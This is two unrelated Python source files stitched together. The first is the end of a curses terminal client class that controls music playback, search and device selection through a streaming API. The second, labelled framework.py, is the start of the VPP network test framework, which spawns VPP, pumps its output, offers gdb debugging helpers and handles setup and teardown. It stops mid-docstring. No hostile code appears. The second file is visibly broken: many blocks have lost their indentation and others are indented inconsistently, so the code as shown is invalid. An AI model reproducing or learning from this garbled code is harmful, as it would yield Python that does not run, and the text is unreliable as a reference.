            curses.KEY_LEFT: self.seek_backward,
        }

        # window size (scry/scrx are currently unused beyond this probe)
        scry, scrx = self.stdscr.getmaxyx()

        # UI components; index 0 (TracksMenu) is treated specially as
        # "the tracklist" throughout this class.
        self.components = [
            TracksMenu(stdscr, self.api, self.play_track, self.status),
            LibraryMenu(stdscr, self.api, self.change_tracklist),
            PlaylistMenu(stdscr, self.api, self.change_tracklist),
            NowPlaying(stdscr),
        ]
        self.search_component = SearchInput(self.stdscr, self.api,
                                            self.search)
        self.device_menu_component = DeviceMenu(self.stdscr, self.api,
                                                self.select_device,
                                                self.hide_popup)

        # Active component
        self.active_component = 0
        self.components[0].activate()

        # Popups
        self.popup = None

        # Set initial tracklist: resume the playing context if one exists,
        # otherwise fall back to the user's top tracks.
        if self.status and 'context' in self.status and type(self.status["context"]) is dict and 'uri' in self.status["context"]:
            self.change_tracklist(
                self.api.get_playlist_tracks(self.status["context"]["uri"]), "Previous Session")
        else:
            self.change_tracklist(self.api.get_top_tracks(), "Top Tracks")

        # Set initial device ID: prefer the currently active device,
        # else the first known device, else None.
        devices = self.api.get_devices()
        if self.status and 'device' in self.status and self.status["device"]["is_active"]:
            self.device_id = self.status["device"]["id"]
        else:
            self.device_id = devices[0]["id"] if devices and len(
                devices) > 0 else None

        # Initial render
        self.render()

        # Poll playing status every second in a new thread
        status_loop = Thread(target=self.status_loop)
        status_loop.daemon = True
        status_loop.start()

        # Start the main event loop (used for responding to key presses and
        # keeping the main process running)
        while 1:
            try:
                if not self.pause_updates:
                    # capture and handle key press
                    key = self.stdscr.getch()
                    if key in self.events.keys():
                        # run the event handler for the key
                        self.events[key]()
                    elif self.popup:
                        # or pass it to the active popup
                        self.popup.receive_input(key)
                    else:
                        # or pass the input to the active component
                        self.components[self.active_component].receive_input(
                            key)
                    # re-render
                    self.render()
            except KeyboardInterrupt:
                sys.exit(0)

    def status_loop(self):
        """Background thread body: refresh playback status roughly once per
        second, aligned to wall-clock seconds since startup."""
        while 1:
            if not self.pause_updates:
                self.status = self.api.get_playing()
                self.components[0].refresh_now_playing(self.status)
                self.render()
            time.sleep(1 - ((time.time() - starttime) % 1))

    def render(self):
        """Erase and redraw every component, then any active popup."""
        self.stdscr.erase()
        for component in self.components:
            # render each component
            component.render(self.status)
        if self.popup:
            self.popup.render()
        self.stdscr.refresh()

    # events

    def change_tracklist(self, tracks, title, tracklist_uri=None):
        """Replace the tracklist contents/title and focus it."""
        self.components[0].update_tracks(tracks, title)
        self.tracklist_uri = tracklist_uri
        self.activate_tracklist()

    def select_next_component(self):
        """Tab handler: move focus to the next interactive component."""
        if self.popup:
            return
        # visually de-activate the current component
        self.components[self.active_component].deactivate()
        # incremement the active component (or go back to start)
        self.active_component = (
            self.active_component +
            1 if self.active_component < len(self.components) - 1 else 0)
        # skip read-only components
        if self.components[self.active_component].interactive:
            self.components[self.active_component].activate()
        else:
            self.select_next_component()

    def play_track(self, track):
        """Open a playlist/show item as a tracklist, or start playback of a
        track on the current device."""
        if track['type'] == 'playlist':
            self.change_tracklist(self.api.get_playlist_tracks(
                track['id'] if track['id'] else track['uri']), track['name'], track['uri'])
            return
        if track['type'] == 'show':
            self.change_tracklist(self.api.show_episodes(
                track['id']), track['name'], track['uri'])
            return
        if self.device_id:
            if self.tracklist_uri:
                # play within the known context (playlist/show URI)
                self.api.start_playback(self.device_id, None,
                                        self.tracklist_uri, {"uri": track["uri"]})
            else:
                # no context: queue the visible tracks explicitly
                self.api.start_playback(
                    self.device_id,
                    list(map(self.__map_tracklist, filter(self.__filter_tracklist,
                                                          self.components[0].tracks))),
                    None,
                    {"uri": track["uri"]},
                )

    @debounce(0.5)
    def toggle_playback(self):
        """Space handler: pause if playing, resume if paused."""
        if not self.device_id or not self.status:
            return
        if self.status["is_playing"]:
            self.api.pause_playback(self.device_id)
            self.status["is_playing"] = False
        else:
            self.api.start_playback(self.device_id)
            self.status["is_playing"] = True

    @debounce(0.5)
    def previous_track(self):
        if self.device_id and self.status and self.status["is_playing"]:
            self.api.previous_track(self.device_id)

    @debounce(0.5)
    def next_track(self):
        if self.device_id and self.status and self.status["is_playing"]:
            self.api.next_track(self.device_id)

    @debounce(1.5)
    def toggle_shuffle(self):
        status = self.api.get_playing()
        if status:
            # NOTE(review): reads shuffle_state from the cached self.status,
            # not the freshly fetched `status` — confirm this is intentional.
            self.api.shuffle(not bool(self.status["shuffle_state"]))

    @debounce(1.5)
    def cycle_repeat(self):
        """Cycle repeat mode off -> track -> context -> off. The chain of
        independent ifs is safe because `status` is not refetched, so only
        one branch can match."""
        status = self.api.get_playing()
        if status:
            if status["repeat_state"] == "off":
                self.api.repeat("track")
            if status["repeat_state"] == "track":
                self.api.repeat("context")
            if status["repeat_state"] == "context":
                self.api.repeat("off")

    @debounce(2)
    def seek_backward(self):
        # jump back 10 s from the last known progress
        if self.device_id and self.status and self.status["is_playing"]:
            progress = self.status["progress_ms"]
            self.api.seek_track(self.device_id, progress - 10000)

    @debounce(2)
    def seek_forward(self):
        # jump forward 10 s from the last known progress
        if self.device_id and self.status and self.status["is_playing"]:
            progress = self.status["progress_ms"]
            self.api.seek_track(self.device_id, progress + 10000)

    def search(self, query):
        """SearchInput callback: show results for queries longer than one
        character."""
        self.hide_popup()
        query = query.strip()
        if query and len(query) > 1:
            results = self.api.search(query)
            self.change_tracklist(results, "Searching: " + query)
        self.render()

    def activate_tracklist(self):
        """Move focus to the tracklist (component 0)."""
        self.components[self.active_component].deactivate()
        self.active_component = 0
        self.components[self.active_component].activate()

    @debounce(2)
    def show_device_menu(self):
        self.components[self.active_component].deactivate()
        self.popup = self.device_menu_component
        self.popup.restart()
        self.popup.activate()
        self.render()

    def show_search_bar(self):
        if self.popup:
            return
        # suspend background refreshes while the user types
        self.pause_updates = True
        self.popup = self.search_component
        self.components[self.active_component].deactivate()
        self.popup.activate()
        self.render()

    def select_device(self, device_id):
        """DeviceMenu callback: remember the chosen playback device."""
        self.device_id = device_id

    def hide_popup(self):
        """Close any open popup, restore focus and resume updates."""
        if self.popup:
            self.popup.deactivate()
            self.popup = None
            self.components[self.active_component].activate()
            self.pause_updates = False
            self.stdscr.clear()
            self.render()

    def handle_resize(self):
        for component in self.components:
            # render each component
            component.restart()
        self.stdscr.clear()

    def handle_exit(self):
        """Escape/q handler: close the popup if one is open, else quit."""
        if self.popup:
            self.hide_popup()
        else:
            sys.exit(0)

    def __filter_tracklist(self, track):
        # keep only real tracks (drop episodes/ads/etc.)
        return track["type"] == 'track'

    def __map_tracklist(self, track):
        return track["uri"]
|
framework.py | #!/usr/bin/env python3
from __future__ import print_function
import gc
import logging
import sys
import os
import select
import signal
import unittest
import tempfile
import time
import faulthandler
import random
import copy
import psutil
import platform
from collections import deque
from threading import Thread, Event
from inspect import getdoc, isclass
from traceback import format_exception
from logging import FileHandler, DEBUG, Formatter
import scapy.compat
from scapy.packet import Raw
import hook as hookmodule
from vpp_pg_interface import VppPGInterface
from vpp_sub_interface import VppSubInterface
from vpp_lo_interface import VppLoInterface
from vpp_bvi_interface import VppBviInterface
from vpp_papi_provider import VppPapiProvider
import vpp_papi
from vpp_papi.vpp_stats import VPPStats
from vpp_papi.vpp_transport_shmem import VppTransportShmemIOError
from log import RED, GREEN, YELLOW, double_line_delim, single_line_delim, \
get_logger, colorize
from vpp_object import VppObjectRegistry
from util import ppp, is_core_present
from scapy.layers.inet import IPerror, TCPerror, UDPerror, ICMPerror
from scapy.layers.inet6 import ICMPv6DestUnreach, ICMPv6EchoRequest
from scapy.layers.inet6 import ICMPv6EchoReply
if os.name == 'posix' and sys.version_info[0] < 3:
# using subprocess32 is recommended by python official documentation
# @ https://docs.python.org/2/library/subprocess.html
import subprocess32 as subprocess
else:
import subprocess
# Python2/3 compatible
try:
input = raw_input
except NameError:
pass
# Module logger for the framework itself.
logger = logging.getLogger(__name__)

# Set up an empty logger for the testcase that can be overridden as necessary
null_logger = logging.getLogger('VppTestCase')
null_logger.addHandler(logging.NullHandler())

# Per-test result codes used by the runner.
PASS = 0
FAIL = 1
ERROR = 2
SKIP = 3
TEST_RUN = 4
class BoolEnvironmentVariable(object):
    """A lazily-evaluated boolean view of an environment variable.

    Truthiness is computed on every bool() call: the variable's current
    value (or *default* when unset) is lowercased and tested for
    membership in *true_values*.
    """

    def __init__(self, env_var_name, default='n', true_values=None):
        if true_values is None:
            true_values = ("y", "yes", "1")
        self.name = env_var_name
        self.default = default
        self.true_values = true_values

    def __bool__(self):
        # Re-read the environment each time so later changes are seen.
        current = os.getenv(self.name, self.default)
        return current.lower() in self.true_values

    if sys.version_info[0] == 2:
        # Python 2 spells the truthiness hook __nonzero__.
        __nonzero__ = __bool__

    def __repr__(self):
        return 'BoolEnvironmentVariable(%r, default=%r, true_values=%r)' % (
            self.name, self.default, self.true_values)
# Framework-level debugging, toggled via the TEST_DEBUG environment variable.
debug_framework = BoolEnvironmentVariable('TEST_DEBUG')
if debug_framework:
    import debug_internal

"""
Test framework module.

The module provides a set of tools for constructing and running tests and
representing the results.
"""
class VppDiedError(Exception):
    """ exception for reporting that the subprocess has died."""

    # Map negative return codes back to signal names (SIGKILL, SIGSEGV, ...).
    signals_by_value = {v: k for k, v in signal.__dict__.items() if
                        k.startswith('SIG') and not k.startswith('SIG_')}

    def __init__(self, rv=None, testcase=None, method_name=None):
        """Build an exception message from the child's return code.

        :param rv: the subprocess return code, or None when unknown
        :param testcase: name of the testcase that was running, if any
        :param method_name: name of the test method that was running, if any
        """
        self.rv = rv
        self.signal_name = None
        self.testcase = testcase
        self.method_name = method_name
        try:
            # negative rv means "killed by signal -rv"
            self.signal_name = VppDiedError.signals_by_value[-rv]
        except (KeyError, TypeError):
            pass

        if testcase is None and method_name is None:
            in_msg = ''
        else:
            in_msg = 'running %s.%s ' % (testcase, method_name)

        if self.rv is None:
            # BUG FIX: the original unconditionally formatted self.rv with
            # %d, so constructing VppDiedError() with the default rv=None
            # raised TypeError instead of producing the intended exception.
            msg = "VPP subprocess died %sunexpectedly." % in_msg
        else:
            msg = "VPP subprocess died %sunexpectedly with return code: %d%s." % (
                in_msg,
                self.rv,
                ' [%s]' % (self.signal_name if
                           self.signal_name is not None else ''))

        super(VppDiedError, self).__init__(msg)
class _PacketInfo(object):
"""Private class to create packet info object.
Help process information about the next packet.
Set variables to default values.
"""
#: Store the index of the packet.
index = -1
#: Store the index of the source packet generator interface of the packet.
src = -1
#: Store the index of the destination packet generator interface
#: of the packet.
dst = -1
#: Store expected ip version
ip = -1
#: Store expected upper protocol
proto = -1
#: Store the copy of the former packet.
data = None
def __eq__(self, other):
index = self.index == other.index
src = self.src == other.src
dst = self.dst == other.dst
data = self.data == other.data
return index and src and dst and data
def pump_output(testclass):
    """ pump output from vpp stdout/stderr to proper queues """
    # Partial lines (no trailing newline yet) are carried over between
    # select() wakeups in these fragment buffers.
    stdout_fragment = ""
    stderr_fragment = ""
    while not testclass.pump_thread_stop_flag.is_set():
        # Block until vpp writes something or the wakeup pipe fires.
        readable = select.select([testclass.vpp.stdout.fileno(),
                                  testclass.vpp.stderr.fileno(),
                                  testclass.pump_thread_wakeup_pipe[0]],
                                 [], [])[0]
        if testclass.vpp.stdout.fileno() in readable:
            read = os.read(testclass.vpp.stdout.fileno(), 102400)
            if len(read) > 0:
                split = read.decode('ascii',
                                    errors='backslashreplace').splitlines(True)
                # prepend any partial line left over from the last read
                if len(stdout_fragment) > 0:
                    split[0] = "%s%s" % (stdout_fragment, split[0])
                # keep an incomplete trailing line out of the deque and
                # carry it into the next iteration instead
                if len(split) > 0 and split[-1].endswith("\n"):
                    limit = None
                else:
                    limit = -1
                    stdout_fragment = split[-1]
                testclass.vpp_stdout_deque.extend(split[:limit])
                if not testclass.cache_vpp_output:
                    for line in split[:limit]:
                        testclass.logger.info(
                            "VPP STDOUT: %s" % line.rstrip("\n"))
        if testclass.vpp.stderr.fileno() in readable:
            read = os.read(testclass.vpp.stderr.fileno(), 102400)
            if len(read) > 0:
                split = read.decode('ascii',
                                    errors='backslashreplace').splitlines(True)
                if len(stderr_fragment) > 0:
                    split[0] = "%s%s" % (stderr_fragment, split[0])
                if len(split) > 0 and split[-1].endswith("\n"):
                    limit = None
                else:
                    limit = -1
                    stderr_fragment = split[-1]
                testclass.vpp_stderr_deque.extend(split[:limit])
                if not testclass.cache_vpp_output:
                    for line in split[:limit]:
                        testclass.logger.error(
                            "VPP STDERR: %s" % line.rstrip("\n"))
        # ignoring the dummy pipe here intentionally - the
        # flag will take care of properly terminating the loop
def _is_skip_aarch64_set():
    # Returns a BoolEnvironmentVariable wrapper, not a plain bool: the
    # environment is re-read each time the result is used in a bool context.
    return BoolEnvironmentVariable('SKIP_AARCH64')

is_skip_aarch64_set = _is_skip_aarch64_set()
def _is_platform_aarch64():
    # True when running on an aarch64 machine (per platform.machine()).
    return platform.machine() == 'aarch64'

is_platform_aarch64 = _is_platform_aarch64()
def _running_extended_tests():
    # BoolEnvironmentVariable wrapper around EXTENDED_TESTS.
    return BoolEnvironmentVariable("EXTENDED_TESTS")

running_extended_tests = _running_extended_tests()
def _running_gcov_tests():
    # BoolEnvironmentVariable wrapper around GCOV_TESTS.
    return BoolEnvironmentVariable("GCOV_TESTS")

running_gcov_tests = _running_gcov_tests()
def _running_on_centos():
os_id = os.getenv("OS_ID", "")
return True if "centos" in os_id.lower() else False
running_on_centos = _running_on_centos()
class KeepAliveReporter(object):
    """
    Singleton object which reports test start to parent process
    """
    # Borg pattern: every instance shares this __dict__.
    _shared_state = {}

    def __init__(self):
        self.__dict__ = self._shared_state
        # NOTE(review): this resets _pipe to None on *every* instantiation,
        # clobbering a pipe set through an earlier instance despite the
        # set-once check in the setter — confirm callers only construct
        # this before assigning the pipe.
        self._pipe = None

    @property
    def pipe(self):
        return self._pipe

    @pipe.setter
    def pipe(self, pipe):
        if self._pipe is not None:
            raise Exception("Internal error - pipe should only be set once.")
        self._pipe = pipe

    def send_keep_alive(self, test, desc=None):
        """
        Write current test tmpdir & desc to keep-alive pipe to signal liveness
        """
        if self.pipe is None:
            # if not running forked..
            return
        if isclass(test):
            desc = '%s (%s)' % (desc, unittest.util.strclass(test))
        else:
            desc = test.id()
        self.pipe.send((desc, test.vpp_bin, test.tempdir, test.vpp.pid))
class VppTestCase(unittest.TestCase):
"""This subclass is a base class for VPP test cases that are implemented as
classes. It provides methods to create and run test case.
"""
extra_vpp_punt_config = []
extra_vpp_plugin_config = []
logger = null_logger
vapi_response_timeout = 5
@property
def packet_infos(self):
    """List of packet infos"""
    # simple read-only view over the per-testcase _packet_infos store
    return self._packet_infos
@classmethod
def get_packet_count_for_if_idx(cls, dst_if_index):
    """Get the number of packet info for specified destination if index"""
    # dict.get with a default collapses the membership-test-then-index
    # pattern into a single lookup; unknown indices still yield 0.
    return cls._packet_count_for_dst_if_idx.get(dst_if_index, 0)
@classmethod
def force_solo(cls):
    """ if the test case class is timing-sensitive - return true """
    # subclasses override this to opt out of parallel execution
    return False
@classmethod
def instance(cls):
    """Return the instance of this testcase"""
    # test_instance is assigned elsewhere during test setup
    return cls.test_instance
@classmethod
def set_debug_flags(cls, d):
    """Decode the DEBUG option string *d* into class-level debug flags.

    Recognized values: core, gdb, gdb-all, gdbserver, gdbserver-all.
    None leaves everything disabled; anything else raises.
    """
    cls.gdbserver_port = 7777
    cls.debug_core = False
    cls.debug_gdb = False
    cls.debug_gdbserver = False
    cls.debug_all = False
    if d is None:
        return
    dl = d.lower()
    if dl == "core":
        cls.debug_core = True
    elif dl in ("gdb", "gdb-all"):
        cls.debug_gdb = True
    elif dl in ("gdbserver", "gdbserver-all"):
        cls.debug_gdbserver = True
    else:
        raise Exception("Unrecognized DEBUG option: '%s'" % d)
    # the "-all" variants additionally set the debug_all flag
    cls.debug_all = dl in ("gdb-all", "gdbserver-all")
@staticmethod
def get_least_used_cpu():
    """Pick a CPU with the fewest vpp_main processes currently pinned to it.

    Buckets CPUs by how many running vpp_main processes occupy them
    (bucket 0 = unused, bucket 1 = one process, ...) and returns a random
    CPU from the least-loaded non-empty bucket.
    """
    # bucket list; index == number of vpp_main processes seen on the CPU
    cpu_usage_list = [set(range(psutil.cpu_count()))]
    vpp_processes = [p for p in psutil.process_iter(attrs=['pid', 'name'])
                     if 'vpp_main' == p.info['name']]
    for vpp_process in vpp_processes:
        for cpu_usage_set in cpu_usage_list:
            try:
                cpu_num = vpp_process.cpu_num()
                if cpu_num in cpu_usage_set:
                    # move this CPU one bucket up (one more occupant)
                    cpu_usage_set_index = cpu_usage_list.index(
                        cpu_usage_set)
                    if cpu_usage_set_index == len(cpu_usage_list) - 1:
                        cpu_usage_list.append({cpu_num})
                    else:
                        cpu_usage_list[cpu_usage_set_index + 1].add(
                            cpu_num)
                    cpu_usage_set.remove(cpu_num)
                    break
            except psutil.NoSuchProcess:
                # process exited while we were scanning; ignore it
                pass

    for cpu_usage_set in cpu_usage_list:
        if len(cpu_usage_set) > 0:
            min_usage_set = cpu_usage_set
            break

    return random.choice(tuple(min_usage_set))
@classmethod
def setUpConstants(cls):
    """ Set-up the test case class based on environment variables """
    cls.step = BoolEnvironmentVariable('STEP')
    d = os.getenv("DEBUG", None)
    # inverted case to handle '' == True
    c = os.getenv("CACHE_OUTPUT", "1")
    cls.cache_vpp_output = False if c.lower() in ("n", "no", "0") else True
    cls.set_debug_flags(d)
    cls.vpp_bin = os.getenv('VPP_BIN', "vpp")
    cls.plugin_path = os.getenv('VPP_PLUGIN_PATH')
    cls.test_plugin_path = os.getenv('VPP_TEST_PLUGIN_PATH')
    cls.extern_plugin_path = os.getenv('EXTERN_PLUGINS')
    # combine the regular and external plugin paths when both are set
    plugin_path = None
    if cls.plugin_path is not None:
        if cls.extern_plugin_path is not None:
            plugin_path = "%s:%s" % (
                cls.plugin_path, cls.extern_plugin_path)
        else:
            plugin_path = cls.plugin_path
    elif cls.extern_plugin_path is not None:
        plugin_path = cls.extern_plugin_path
    debug_cli = ""
    if cls.step or cls.debug_gdb or cls.debug_gdbserver:
        # expose a CLI socket so a human can drive vpp while debugging
        debug_cli = "cli-listen localhost:5002"
    coredump_size = None
    size = os.getenv("COREDUMP_SIZE")
    if size is not None:
        coredump_size = "coredump-size %s" % size
    if coredump_size is None:
        coredump_size = "coredump-size unlimited"

    cpu_core_number = cls.get_least_used_cpu()
    if not hasattr(cls, "worker_config"):
        cls.worker_config = ""

    default_variant = os.getenv("VARIANT")
    if default_variant is not None:
        default_variant = "defaults { %s 100 }" % default_variant
    else:
        default_variant = ""

    api_fuzzing = os.getenv("API_FUZZ")
    if api_fuzzing is None:
        api_fuzzing = 'off'

    # vpp's unix-style config is passed as a flat token list; the exact
    # token order matters to vpp's config parser.
    cls.vpp_cmdline = [cls.vpp_bin, "unix",
                       "{", "nodaemon", debug_cli, "full-coredump",
                       coredump_size, "runtime-dir", cls.tempdir, "}",
                       "api-trace", "{", "on", "}", "api-segment", "{",
                       "prefix", cls.shm_prefix, "}", "cpu", "{",
                       "main-core", str(cpu_core_number),
                       cls.worker_config, "}",
                       "physmem", "{", "max-size", "32m", "}",
                       "statseg", "{", "socket-name", cls.stats_sock, "}",
                       "socksvr", "{", "socket-name", cls.api_sock, "}",
                       "node { ", default_variant, "}",
                       "api-fuzz {", api_fuzzing, "}",
                       "plugins",
                       "{", "plugin", "dpdk_plugin.so", "{", "disable",
                       "}", "plugin", "rdma_plugin.so", "{", "disable",
                       "}", "plugin", "unittest_plugin.so", "{", "enable",
                       "}"] + cls.extra_vpp_plugin_config + ["}", ]

    if cls.extra_vpp_punt_config is not None:
        cls.vpp_cmdline.extend(cls.extra_vpp_punt_config)
    if plugin_path is not None:
        cls.vpp_cmdline.extend(["plugin_path", plugin_path])
    if cls.test_plugin_path is not None:
        cls.vpp_cmdline.extend(["test_plugin_path", cls.test_plugin_path])

    cls.logger.info("vpp_cmdline args: %s" % cls.vpp_cmdline)
    cls.logger.info("vpp_cmdline: %s" % " ".join(cls.vpp_cmdline))
    @classmethod
    def wait_for_enter(cls):
        """Print debugger attach instructions and block until ENTER is hit.

        Interactive only when running under gdb or gdbserver debugging;
        otherwise just logs the spawned VPP PID and returns immediately.
        """
        if cls.debug_gdbserver:
            print(double_line_delim)
            print("Spawned GDB server with PID: %d" % cls.vpp.pid)
        elif cls.debug_gdb:
            print(double_line_delim)
            print("Spawned VPP with PID: %d" % cls.vpp.pid)
        else:
            # non-debug run: no interaction needed
            cls.logger.debug("Spawned VPP with PID: %d" % cls.vpp.pid)
            return
        print(single_line_delim)
        print("You can debug VPP using:")
        if cls.debug_gdbserver:
            print("sudo gdb " + cls.vpp_bin +
                  " -ex 'target remote localhost:{port}'"
                  .format(port=cls.gdbserver_port))
            print("Now is the time to attach gdb by running the above "
                  "command, set up breakpoints etc., then resume VPP from "
                  "within gdb by issuing the 'continue' command")
            # bump the port so the next gdbserver instance gets its own
            cls.gdbserver_port += 1
        elif cls.debug_gdb:
            print("sudo gdb " + cls.vpp_bin + " -ex 'attach %s'" % cls.vpp.pid)
            print("Now is the time to attach gdb by running the above "
                  "command and set up breakpoints etc., then resume VPP from"
                  " within gdb by issuing the 'continue' command")
        print(single_line_delim)
        input("Press ENTER to continue running the testcase...")
    @classmethod
    def run_vpp(cls):
        """Start the VPP child process, optionally wrapped in gdbserver.

        Stores the subprocess.Popen handle in ``cls.vpp`` (stdout/stderr
        piped for the pump thread) and then calls wait_for_enter() so a
        debugger can be attached before the test proceeds.

        :raises Exception: if gdbserver debugging was requested but the
            gdbserver binary is missing or not executable
        """
        cmdline = cls.vpp_cmdline
        if cls.debug_gdbserver:
            gdbserver = '/usr/bin/gdbserver'
            if not os.path.isfile(gdbserver) or \
                    not os.access(gdbserver, os.X_OK):
                raise Exception("gdbserver binary '%s' does not exist or is "
                                "not executable" % gdbserver)
            # prepend gdbserver so VPP starts suspended under its control
            cmdline = [gdbserver, 'localhost:{port}'
                       .format(port=cls.gdbserver_port)] + cls.vpp_cmdline
            cls.logger.info("Gdbserver cmdline is %s", " ".join(cmdline))
        try:
            cls.vpp = subprocess.Popen(cmdline,
                                       stdout=subprocess.PIPE,
                                       stderr=subprocess.PIPE)
        except subprocess.CalledProcessError as e:
            # NOTE(review): Popen itself does not raise CalledProcessError
            # (only check_call/check_output do) - this branch looks
            # unreachable; confirm before removing
            cls.logger.critical("Subprocess returned with non-0 return code: ("
                                "%s)", e.returncode)
            raise
        except OSError as e:
            # e.g. binary not found / not executable
            cls.logger.critical("Subprocess returned with OS error: "
                                "(%s) %s", e.errno, e.strerror)
            raise
        except Exception as e:
            cls.logger.exception("Subprocess returned unexpected from "
                                 "%s:", cmdline)
            raise
        cls.wait_for_enter()
@classmethod
def wait_for_coredump(cls):
corefile = cls.tempdir + "/core"
if os.path.isfile(corefile):
cls.logger.error("Waiting for coredump to complete: %s", corefile)
curr_size = os.path.getsize(corefile)
deadline = time.time() + 60
ok = False
while time.time() < deadline:
cls.sleep(1)
size = curr_size
curr_size = os.path.getsize(corefile)
if size == curr_size:
ok = True
break
if not ok:
cls.logger.error("Timed out waiting for coredump to complete:"
" %s", corefile)
else:
cls.logger.error("Coredump complete: %s, size %d",
corefile, curr_size)
    @classmethod
    def setUpClass(cls):
        """
        Perform class setup before running the testcase

        Create the per-test-case temp dir and logger, seed the RNG from
        $RND_SEED, start vpp and connect the vpp-api.
        """
        super(VppTestCase, cls).setUpClass()
        gc.collect()  # run garbage collection first
        cls.logger = get_logger(cls.__name__)
        seed = os.environ["RND_SEED"]
        random.seed(seed)
        if hasattr(cls, 'parallel_handler'):
            # when running in parallel, route log records to the parallel
            # handler only (avoid duplicates via the root logger)
            cls.logger.addHandler(cls.parallel_handler)
            cls.logger.propagate = False
        cls.tempdir = tempfile.mkdtemp(
            prefix='vpp-unittest-%s-' % cls.__name__)
        cls.stats_sock = "%s/stats.sock" % cls.tempdir
        cls.api_sock = "%s/api.sock" % cls.tempdir
        cls.file_handler = FileHandler("%s/log.txt" % cls.tempdir)
        cls.file_handler.setFormatter(
            Formatter(fmt='%(asctime)s,%(msecs)03d %(message)s',
                      datefmt="%H:%M:%S"))
        cls.file_handler.setLevel(DEBUG)
        cls.logger.addHandler(cls.file_handler)
        cls.logger.debug("--- setUpClass() for %s called ---" %
                         cls.__name__)
        # shared-memory prefix is derived from the unique temp dir name
        cls.shm_prefix = os.path.basename(cls.tempdir)
        os.chdir(cls.tempdir)
        cls.logger.info("Temporary dir is %s, shm prefix is %s",
                        cls.tempdir, cls.shm_prefix)
        cls.logger.debug("Random seed is %s" % seed)
        cls.setUpConstants()
        cls.reset_packet_infos()
        cls._captures = []
        cls.verbose = 0
        cls.vpp_dead = False
        cls.registry = VppObjectRegistry()
        cls.vpp_startup_failed = False
        cls.reporter = KeepAliveReporter()
        # need to catch exceptions here because if we raise, then the cleanup
        # doesn't get called and we might end with a zombie vpp
        try:
            cls.run_vpp()
            cls.reporter.send_keep_alive(cls, 'setUpClass')
            VppTestResult.current_test_case_info = TestCaseInfo(
                cls.logger, cls.tempdir, cls.vpp.pid, cls.vpp_bin)
            cls.vpp_stdout_deque = deque()
            cls.vpp_stderr_deque = deque()
            # background thread draining vpp's stdout/stderr pipes
            cls.pump_thread_stop_flag = Event()
            cls.pump_thread_wakeup_pipe = os.pipe()
            cls.pump_thread = Thread(target=pump_output, args=(cls,))
            cls.pump_thread.daemon = True
            cls.pump_thread.start()
            if cls.debug_gdb or cls.debug_gdbserver:
                # no API timeout when debugging - VPP may be stopped in gdb
                cls.vapi_response_timeout = 0
            cls.vapi = VppPapiProvider(cls.shm_prefix, cls.shm_prefix, cls,
                                       cls.vapi_response_timeout)
            if cls.step:
                hook = hookmodule.StepHook(cls)
            else:
                hook = hookmodule.PollHook(cls)
            cls.vapi.register_hook(hook)
            cls.statistics = VPPStats(socketname=cls.stats_sock)
            try:
                hook.poll_vpp()
            except VppDiedError:
                cls.vpp_startup_failed = True
                cls.logger.critical(
                    "VPP died shortly after startup, check the"
                    " output to standard error for possible cause")
                raise
            try:
                cls.vapi.connect()
            except vpp_papi.VPPIOError as e:
                cls.logger.debug("Exception connecting to vapi: %s" % e)
                cls.vapi.disconnect()
                if cls.debug_gdbserver:
                    print(colorize("You're running VPP inside gdbserver but "
                                   "VPP-API connection failed, did you forget "
                                   "to 'continue' VPP from within gdb?", RED))
                raise
            except vpp_papi.VPPRuntimeError as e:
                cls.logger.debug("%s" % e)
                cls.quit()
                raise
            except Exception as e:
                cls.logger.debug("Exception connecting to VPP: %s" % e)
                cls.quit()
                raise
@classmethod
def _debug_quit(cls):
if (cls.debug_gdbserver or cls.debug_gdb):
try:
cls.vpp.poll()
if cls.vpp.returncode is None:
print()
print(double_line_delim)
print("VPP or GDB server is still running")
print(single_line_delim)
input("When done debugging, press ENTER to kill the "
"process and finish running the testcase...")
except AttributeError:
pass
    @classmethod
    def quit(cls):
        """
        Disconnect vpp-api, kill vpp and cleanup shared memory files

        Safe to call even when parts of setup never ran - each resource is
        checked with hasattr() before being torn down.
        """
        cls._debug_quit()
        # first signal that we want to stop the pump thread, then wake it up
        if hasattr(cls, 'pump_thread_stop_flag'):
            cls.pump_thread_stop_flag.set()
        if hasattr(cls, 'pump_thread_wakeup_pipe'):
            os.write(cls.pump_thread_wakeup_pipe[1], b'ding dong wake up')
        if hasattr(cls, 'pump_thread'):
            cls.logger.debug("Waiting for pump thread to stop")
            cls.pump_thread.join()
        if hasattr(cls, 'vpp_stderr_reader_thread'):
            cls.logger.debug("Waiting for stderr pump to stop")
            cls.vpp_stderr_reader_thread.join()
        if hasattr(cls, 'vpp'):
            if hasattr(cls, 'vapi'):
                # disconnect API client before killing the process
                cls.logger.debug(cls.vapi.vpp.get_stats())
                cls.logger.debug("Disconnecting class vapi client on %s",
                                 cls.__name__)
                cls.vapi.disconnect()
                cls.logger.debug("Deleting class vapi attribute on %s",
                                 cls.__name__)
                del cls.vapi
            cls.vpp.poll()
            if cls.vpp.returncode is None:
                # still running: let any in-progress core dump finish,
                # then terminate and reap the process
                cls.wait_for_coredump()
                cls.logger.debug("Sending TERM to vpp")
                cls.vpp.terminate()
                cls.logger.debug("Waiting for vpp to die")
                cls.vpp.communicate()
            cls.logger.debug("Deleting class vpp attribute on %s",
                             cls.__name__)
            del cls.vpp
        # startup failure promotes captured stderr to critical level
        if cls.vpp_startup_failed:
            stdout_log = cls.logger.info
            stderr_log = cls.logger.critical
        else:
            stdout_log = cls.logger.info
            stderr_log = cls.logger.info
        if hasattr(cls, 'vpp_stdout_deque'):
            stdout_log(single_line_delim)
            stdout_log('VPP output to stdout while running %s:', cls.__name__)
            stdout_log(single_line_delim)
            vpp_output = "".join(cls.vpp_stdout_deque)
            with open(cls.tempdir + '/vpp_stdout.txt', 'w') as f:
                f.write(vpp_output)
            stdout_log('\n%s', vpp_output)
            stdout_log(single_line_delim)
        if hasattr(cls, 'vpp_stderr_deque'):
            stderr_log(single_line_delim)
            stderr_log('VPP output to stderr while running %s:', cls.__name__)
            stderr_log(single_line_delim)
            vpp_output = "".join(cls.vpp_stderr_deque)
            with open(cls.tempdir + '/vpp_stderr.txt', 'w') as f:
                f.write(vpp_output)
            stderr_log('\n%s', vpp_output)
            stderr_log(single_line_delim)
    @classmethod
    def tearDownClass(cls):
        """ Perform final cleanup after running all tests in this test-case """
        cls.logger.debug("--- tearDownClass() for %s called ---" %
                         cls.__name__)
        cls.reporter.send_keep_alive(cls, 'tearDownClass')
        # stop vpp and release all resources acquired in setUpClass()
        cls.quit()
        cls.file_handler.close()
        cls.reset_packet_infos()
        if debug_framework:
            debug_internal.on_tear_down_class(cls)
    def show_commands_at_teardown(self):
        """ Allow subclass specific teardown logging additions.

        Subclasses override this to log extra "show ..." CLI output in
